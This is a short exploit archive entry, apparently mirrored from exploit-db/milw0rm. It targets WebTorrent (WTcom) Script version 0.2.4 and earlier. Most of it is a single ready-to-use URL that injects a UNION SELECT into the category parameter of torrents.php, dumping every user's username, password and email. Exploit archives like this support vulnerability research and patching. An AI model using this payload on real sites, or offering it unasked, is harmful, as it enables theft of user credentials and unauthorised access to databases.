exploit-db-mirror/platforms/php/webapps/2200.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

10 lines
395 B
Text
Executable file

# WebTorrent (WTcom) Script <= 0.2.4
# ----------------------------------
# >>> Remote SQL Injection
# <<< Every Username, Password and Email
# ----------------------------------
# Author: sh1r081 (sh1r081[at]gmail.com)
http://[SITE]/torrents.php?mode=category&cat=0%20union%20select%20null,null,concat(username,char(32),password,char(32),email)%20from%20users%20/*
# milw0rm.com [2006-08-17]